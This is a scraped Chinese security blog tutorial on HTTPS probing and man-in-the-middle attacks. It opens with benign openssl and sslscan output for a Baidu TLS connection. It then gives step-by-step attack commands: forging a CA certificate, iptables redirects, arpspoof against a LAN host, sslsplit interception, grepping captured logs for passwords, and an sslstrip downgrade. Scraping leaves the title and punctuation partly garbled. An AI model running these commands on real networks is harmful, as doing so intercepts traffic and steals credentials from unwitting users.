wordpress 新建导航,外贸站seo,重庆价格信息网官网,网站制作开发平台免责声明#xff1a;本文仅做分享#xff01; 目录
https探测
openssl
Openssl连接服务器获取基本信息
连接命令#xff1a;
指定算法连接:
测试弱协议连接是否可以连接:
得到的内容包括#xff1a;
sslscan
在线查询证书
https AK type
中间人AK
sslsplit 工具… 免责声明本文仅做分享 目录
https探测
openssl
Openssl连接服务器获取基本信息
连接命令
指定算法连接:
测试弱协议连接是否可以连接:
得到的内容包括
sslscan
在线查询证书
https AK type
中间人AK
sslsplit 工具
操作
降级AK https探测
openssl
OpenSSL是一个安全套接字层密码库囊括主要的密码算法、常用的密钥和证书封装管理功能及SSL协议并提供丰富的应用程序供测试或其它目的使用。
Openssl连接服务器获取基本信息
连接命令
openssl s_client -connect www.xxx.com:443
指定算法连接:
openssl s_client -tls1_2 -cipher ECDHE-RSA-AES128-GCM-SHA256 -connect www.xxx.com:443
测试弱协议连接是否可以连接:
┌──(root㉿localhost)-[~]
└─# openssl ciphers -v NULL,EXPORT,LOW,DES
TLS_AES_256_GCM_SHA384 TLSv1.3 Kxany Auany EncAESGCM(256) MacAEAD
TLS_CHACHA20_POLY1305_SHA256 TLSv1.3 Kxany Auany EncCHACHA20/POLY1305(256) MacAEAD
TLS_AES_128_GCM_SHA256 TLSv1.3 Kxany Auany EncAESGCM(128) MacAEAD
ECDHE-ECDSA-NULL-SHA TLSv1 KxECDH AuECDSA EncNone MacSHA1
ECDHE-RSA-NULL-SHA TLSv1 KxECDH AuRSA EncNone MacSHA1
AECDH-NULL-SHA TLSv1 KxECDH AuNone EncNone MacSHA1
NULL-SHA256 TLSv1.2 KxRSA AuRSA EncNone MacSHA256
ECDHE-PSK-NULL-SHA384 TLSv1 KxECDHEPSK AuPSK EncNone MacSHA384
ECDHE-PSK-NULL-SHA256 TLSv1 KxECDHEPSK AuPSK EncNone MacSHA256
ECDHE-PSK-NULL-SHA TLSv1 KxECDHEPSK AuPSK EncNone MacSHA1
RSA-PSK-NULL-SHA384 TLSv1 KxRSAPSK AuRSA EncNone MacSHA384
RSA-PSK-NULL-SHA256 TLSv1 KxRSAPSK AuRSA EncNone MacSHA256
DHE-PSK-NULL-SHA384 TLSv1 KxDHEPSK AuPSK EncNone MacSHA384
DHE-PSK-NULL-SHA256 TLSv1 KxDHEPSK AuPSK EncNone MacSHA256
RSA-PSK-NULL-SHA SSLv3 KxRSAPSK AuRSA EncNone MacSHA1
DHE-PSK-NULL-SHA SSLv3 KxDHEPSK AuPSK EncNone MacSHA1
NULL-SHA SSLv3 KxRSA AuRSA EncNone MacSHA1
NULL-MD5 SSLv3 KxRSA AuRSA EncNone MacMD5
PSK-NULL-SHA384 TLSv1 KxPSK AuPSK EncNone MacSHA384
PSK-NULL-SHA256 TLSv1 KxPSK AuPSK EncNone MacSHA256
PSK-NULL-SHA SSLv3 KxPSK AuPSK EncNone MacSHA1 得到的内容包括
1.证书链
2证书
3Cipher-Suite(安全算法
4会话信息
┌──(root㉿localhost)-[~]
└─# openssl s_client www.baidu.com:443
Connecting to 110.242.68.3
CONNECTED(00000003)
depth2 OUGlobalSign Root CA - R3, OGlobalSign, CNGlobalSign
verify return:1
depth1 CBE, OGlobalSign nv-sa, CNGlobalSign RSA OV SSL CA 2018
verify return:1
depth0 CCN, STbeijing, Lbeijing, OBeijing Baidu Netcom Science Technology Co., Ltd, CNbaidu.com
verify return:1
---
Certificate chain ###########证书链###############0 s:CCN, STbeijing, Lbeijing, OBeijing Baidu Netcom Science Technology Co., Ltd, CNbaidu.comi:CBE, OGlobalSign nv-sa, CNGlobalSign RSA OV SSL CA 2018a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256v:NotBefore: Jul 8 01:41:02 2024 GMT; NotAfter: Aug 9 01:41:01 2025 GMT1 s:CBE, OGlobalSign nv-sa, CNGlobalSign RSA OV SSL CA 2018i:OUGlobalSign Root CA - R3, OGlobalSign, CNGlobalSigna:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256v:NotBefore: Nov 21 00:00:00 2018 GMT; NotAfter: Nov 21 00:00:00 2028 GMT2 s:OUGlobalSign Root CA - R3, OGlobalSign, CNGlobalSigni:CBE, OGlobalSign nv-sa, OURoot CA, CNGlobalSign Root CAa:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256v:NotBefore: Sep 19 00:00:00 2018 GMT; NotAfter: Jan 28 12:00:00 2028 GMT
---
Server certificate ######证书########
-----BEGIN CERTIFICATE-----
MIIJ7DCCCNSgAwIBAgIMTkADpl62gfh/S9jrMA0GCSqGSIb3DQEBCwUAMFAxCzAJ
BgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMSYwJAYDVQQDEx1H
bG9iYWxTaWduIFJTQSBPViBTU0wgQ0EgMjAxODAeFw0yNDA3MDgwMTQxMDJaFw0y
NTA4MDkwMTQxMDFaMIGAMQswCQYDVQQGEwJDTjEQMA4GA1UECBMHYmVpamluZzEQ
MA4GA1UEBxMHYmVpamluZzE5MDcGA1UEChMwQmVpamluZyBCYWlkdSBOZXRjb20g
U2NpZW5jZSBUZWNobm9sb2d5IENvLiwgTHRkMRIwEAYDVQQDEwliYWlkdS5jb20w
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC1wFMskJ2dseOqoHptNwot
FOhdBERsZ4VQnRNKXEEXMQEfgbNtScQC/ZIpRAt1EObhYlifn74kt2nTsCQLng
jfQkRVBuO/6PNGKdlCYGBeGqAL7xRLOyHnpH9mwCBJcWVt2zYM9I1clpXCJaI
tsq6qpb1AGoQxRDZ2n4K8Gd61wgNCPHDHc/Lk9NPJoUBMvYWvEe5lKhHsJtWtHe4
QC3y58Vir5R0PWn2hyTBr9fCo58p/stDiRqp9Irtmi95YhwkNkmgwpMB8RhcGoN
hUw5TkPZVj4AVaoPT1ED/GMKZev0ypmp0nmjVg2x7yUfLUfp3X7oBdI4TS2hv
AgMBAAGjggaTMIIGjzAOBgNVHQ8BAf8EBAMCBaAwDAYDVR0TAQH/BAIwADCBjgYI
KwYBBQUHAQEEgYEwfzBEBggrBgEFBQcwAoY4aHR0cDovL3NlY3VyZS5nbG9iYWxz
aWduLmNvbS9jYWNlcnQvZ3Nyc2FvdnNzbGNhMjAxOC5jcnQwNwYIKwYBBQUHMAGG
K2h0dHA6Ly9vY3NwLmdsb2JhbHNpZ24uY29tL2dzcnNhb3Zzc2xjYTIwMTgwVgYD
VR0gBE8wTTBBBgkrBgEEAaAyARQwNDAyBggrBgEFBQcCARYmaHR0cHM6Ly93d3cu
Z2xvYmFsc2lnbi5jb20vcmVwb3NpdG9yeS8wCAYGZ4EMAQICMD8GA1UdHwQ4MDYw
NKAyoDCGLmh0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vZ3Nyc2FvdnNzbGNhMjAx
OC5jcmwwggNhBgNVHREEggNYMIIDVIIJYmFpZHUuY29tggxiYWlmdWJhby5jb22C
DHd3dy5iYWlkdS5jboIQd3d3LmJhaWR1LmNvbS5jboIPbWN0LnkubnVvbWkuY29t
ggthcG9sbG8uYXV0b4IGZHd6LmNuggsqLmJhaWR1LmNvbYIOKi5iYWlmdWJhby5j
b22CESouYmFpZHVzdGF0aWMuY29tgg4qLmJkc3RhdGljLmNvbYILKi5iZGltZy5j
b22CDCouaGFvMTIzLmNvbYILKi5udW9taS5jb22CDSouY2h1YW5rZS5jb22CDSou
dHJ1c3Rnby5jb22CDyouYmNlLmJhaWR1LmNvbYIQKi5leXVuLmJhaWR1LmNvbYIP
Ki5tYXAuYmFpZHUuY29tgg8qLm1iZC5iYWlkdS5jb22CESouZmFueWkuYmFpZHUu
Y29tgg4qLmJhaWR1YmNlLmNvbYIMKi5taXBjZG4uY29tghAqLm5ld3MuYmFpZHUu
Y29tgg4qLmJhaWR1cGNzLmNvbYIMKi5haXBhZ2UuY29tggsqLmFpcGFnZS5jboIN
Ki5iY2Vob3N0LmNvbYIQKi5zYWZlLmJhaWR1LmNvbYIOKi5pbS5iYWlkdS5jb22C
EiouYmFpZHVjb250ZW50LmNvbYILKi5kbG5lbC5jb22CCyouZGxuZWwub3JnghIq
LmR1ZXJvcy5iYWlkdS5jb22CDiouc3UuYmFpZHUuY29tgggqLjkxLmNvbYISKi5o
YW8xMjMuYmFpZHUuY29tgg0qLmFwb2xsby5hdXRvghIqLnh1ZXNodS5iYWlkdS5j
b22CESouYmouYmFpZHViY2UuY29tghEqLmd6LmJhaWR1YmNlLmNvbYIOKi5zbWFy
dGFwcHMuY26CDSouYmR0anJjdi5jb22CDCouaGFvMjIyLmNvbYIMKi5oYW9rYW4u
Y29tgg8qLnBhZS5iYWlkdS5jb22CESoudmQuYmRzdGF0aWMuY29tghEqLmNsb3Vk
LmJhaWR1LmNvbYISY2xpY2suaG0uYmFpZHUuY29tghBsb2cuaG0uYmFpZHUuY29t
ghBjbS5wb3MuYmFpZHUuY29tghB3bi5wb3MuYmFpZHUuY29tghR1cGRhdGUucGFu
LmJhaWR1LmNvbTAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwHwYDVR0j
BBgwFoAUO9/8s14Z6jeb48kjYjxhwMCsswHQYDVR0OBBYEFK3KAFTK2OWUtoD
2ieAKE5ZJDsYMIIBfwYKKwYBBAHWeQIEAgSCAW8EggFrAWkAdgCvGBoo1oyj4KmK
TJxnqwn4u7wiuq68sTijoZ3TbYDDQAAAZCQAGzzAAAEAwBHMEUCIFwF5JczyIF
Gnpxchz9fY1qzlqg/oVrs2nnuxcpBuuIAiEAu3scD6u51VOP/9aMSqR2yKHZLbHw
Fos9U7AzSdLIZa8AdgAS8U40vVNyTIQGGcOPP3oTOe1YoeInG0wBYTr5YYmOgAA
AZCQAG3iAAAEAwBHMEUCIBBYQ6NP7VUDgfktWRg5QxT23QAbTqYovtV2D9O8Qc0T
AiEA2P744EvQ5adwL1y56oyxv/mGujeia7wpo7Xbhv6MAdwAN4fIwK9MNwUBi
EgnqVS78R3R8sdfpMO8OQh60fk6qNAAAAZCQAGyAAAEAwBIMEYCIQDU7Hxtx4c9
p9JdcrDCMtyRYSc0b8cktCcbMmtDE9ygIhAIpJd4yb7jtxnaEC8oLWDushbK1v
0BIuZu6YrQvsf1nQMA0GCSqGSIb3DQEBCwUAA4IBAQCh9DfewC012/fHZpmSpCn
yh3/ClAZ8cJVOLCmYz9r6bkyhcFquJ5qUpyoW8AYtU0oUFlqH6zLIyujW7lq
wFxB6NsXKKdwBKmMbmnZr2Fca5fTtwD/GDJgG/egr7fI1u8194j9KEl8cK8Fujm
UsoWklEzd1It9xkLazJR/6SwbhSR4k610pvj8rQrS4wAewuYFDaDOfqsHtDIsx1
tZfIfoB/O1wGWZQJU2M9wC8uYq0jQ2Q0MQJXuyJz04MFiGrPAS1Uk8mWd8M3p65
Xy4iAf8uWzs1MfcwBE8BNBghkQgEFSUsldm5ZBCazU0joJswzldWisXMLTagI
-----END CERTIFICATE-----
subjectCCN, STbeijing, Lbeijing, OBeijing Baidu Netcom Science Technology Co., Ltd, CNbaidu.com
issuerCBE, OGlobalSign nv-sa, CNGlobalSign RSA OV SSL CA 2018
--- #########安全算法#########
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: ECDH, prime256v1, 256 bits
---
SSL handshake has read 5414 bytes and written 586 bytes
Verification: OK
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES128-GCM-SHA256
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session: ############会话信息############Protocol : TLSv1.2Cipher : ECDHE-RSA-AES128-GCM-SHA256Session-ID: C3DE19032169B078EA8451E76C755BDBB63667BA8CC84791169936F15F8108EDSession-ID-ctx:Master-Key: B7E6E9F69ECA343EE4DFC516504105129748858E4A411009D9A929254F0D27423E3D94A122F01B4FFCE841383938FC82PSK identity: NonePSK identity hint: NoneSRP username: NoneTLS session ticket:0000 - f4 89 30 9d 52 3d 65 42-67 d7 26 9a e8 98 bf 66 ..0.ReBg.....f0010 - d8 b6 30 d7 8f 4e f9 a6-a5 05 06 dd 10 35 28 8f ..0..N.......5(.0020 - 61 d5 b2 d6 a6 6c 1c d6-a1 1e 74 df aa 28 64 7a a....l....t..(dz0030 - 0a 77 65 b0 e4 9d 7d 69-b0 0b 1f 74 14 3d 60 55 .we...}i...t.U0040 - 13 c2 07 e5 0f bf 2a 1d-0e 91 6c 70 67 48 57 62 ......*...lpgHWb0050 - a3 5a ed a6 83 94 72 a2-ab 0c a0 73 f4 f1 54 68 .Z....r....s..Th0060 - d3 d6 93 63 32 b6 7f 92-4a de ac ad 2d e5 ad 21 ...c2...J...-..!0070 - 8d 70 de 4e a3 95 01 c1-03 31 40 9b f9 e8 77 c8 .p.N.....1...w.0080 - ee b2 30 4b 05 2e 84 b8-81 2c fe ca 02 cd b8 ed ..0K.....,......0090 - e0 11 c8 54 03 39 c9 59-08 8f 29 4d d0 dc b5 29 ...T.9.Y..)M...)
Start Time: 1722726526Timeout : 7200 (sec)Verify return code: 0 (ok)Extended master secret: no
---
sslscan
sslscan --tlsall 域名:443
在线查询证书
测试,返回信息,安全性,
SSL Server Test (Powered by Qualys SSL Labs) ???.... https AK type
中间人攻击在这些攻击中黑客将自己置于用户和服务器之间拦截通信。 它们可以窃听和修改它们之间传输的数据获取登录凭证或财务细节等敏感信息。降级攻击此类攻击以 SSL 协议为目标迫使通信使用过时的版本如 SSL 3.0。 攻击者可以利用协议中的弱点对加密流量进行解密。SSL 剥离攻击这些攻击利用 HTTPS 连接建立方式中的漏洞。 攻击者拦截用户与网络服务器之间的流量并将连接降级为 HTTP。 由于用户和服务器之间传输的其他敏感数据没有像 HTTPS 连接那样加密因此这种操作允许他们查看和操作这些数据。SSL 重新协商攻击网络犯罪分子利用客户端和服务器之间 SSL 流量重新协商的缺陷。 通过操纵这一过程他们可以在通信中注入恶意代码或命令从而可能破坏连接。会话劫持攻击在这些攻击中攻击者会窃取用户或服务器的会话验证证书或私钥从而冒充证书持有者。 这样他们就能在任何一方都没有意识到自己受到威胁的情况下拦截和操纵传输。SSL 注入攻击这些漏洞涉及通过 SSL 流量在用户和服务器之间的通信中注入恶意代码或命令。 因此黑客会在未经授权的情况下获取敏感信息。漏洞
SSL 攻击和漏洞 - 基本指南 - SSL Dragon 中间人AK
2014 年的Darkhotel 攻击是中间人攻击的一个突出真实案例。 在这场复杂的网络间谍活动中黑客潜入了政府官员和企业高管等高级别客人经常光顾的酒店 Wi-Fi 网络。
sslsplit 工具
透明SSL/TLS中间人攻击工具
对客户端伪装成服务器对服务器
伪装成普通客户端伪装服务器需要伪造证书
支持SSL/TLS加密的SMTP、POP3、FTP等通信中间人攻击
操作
产生公钥
openssl genrsa -out ag.key 2048
产生CA证书
openssl req -new -x509 -days 365 -key ag.key -out ag.crt
---
.key
.crt
激活路由转发:
echo 1 /proc/sys/net/ipv4/ip_forward
查看规则
iptables -L
查看 NAT 规则:
iptables -t nat -L
清空NAT规则
iptables -t nat -F
确认80和443没有其他服务在侦听
netstat -pantu | grep 80
netstat -pantu | grep 443
配置NAT规则:(配置完成后使用 iptables -t nat -L 查看策略)
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
格式介绍:
-t:指定表;
-APERROUTING:路由前生效;
-p:指定协议;
--dport:接受流量的端口;
-j:指定处理方法REDIRECT重定向;
--to-ports:转发端口 开启arp欺骗:
工作组局域网-ARP欺骗-攻击防御单双向_内网arp双向欺骗-CSDN博客
arpspoof -i eth0 -t 192.168.49.133 -r 192.168.49.2 mkdir -p /home/kali/桌面/logdir
激活中间人
sslsplit -D -l connect.log -j /home/kali/桌面/ -S /home/kali/桌面/logdir/ -k ag.key -c ag.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080 访问--证书会报错---继续-- 然后在上面的操作流量就会被监控。 grep pwd * 降级AK
2014 年谷歌研究人员 Bodo Möller、Thai Duong 和 Krzysztof Kotowicz 发现了这个名为[POODLE 的漏洞](https://www.ssldragon.com/zh/blog/what-is-poodle-attack-ssl/)。 这次攻击的目标是 SSL 3.0 加密协议当时网络服务器和浏览器仍广泛支持该协议。
https---http
不用考虑证书的问题. (自己产生)
激活:由于sslstrip只能支持一个端口所以需要把所有流量都引到8080
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
iptables -t nat -L
arpspoof -i eth0 -t 192.168.49.133 -r 192.168.49.2
激活:
sslstrip -l 8080 --只有纯https加密的才行.
logex 解析工具:
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/logex/log_ex.py.tar.gz
tar -zxvf log_ex.py.tar.gz
./log_ex.py sslstrip.log -a -r 人家网站要不就是加密组件加密 . 要不就是不加密 . ...
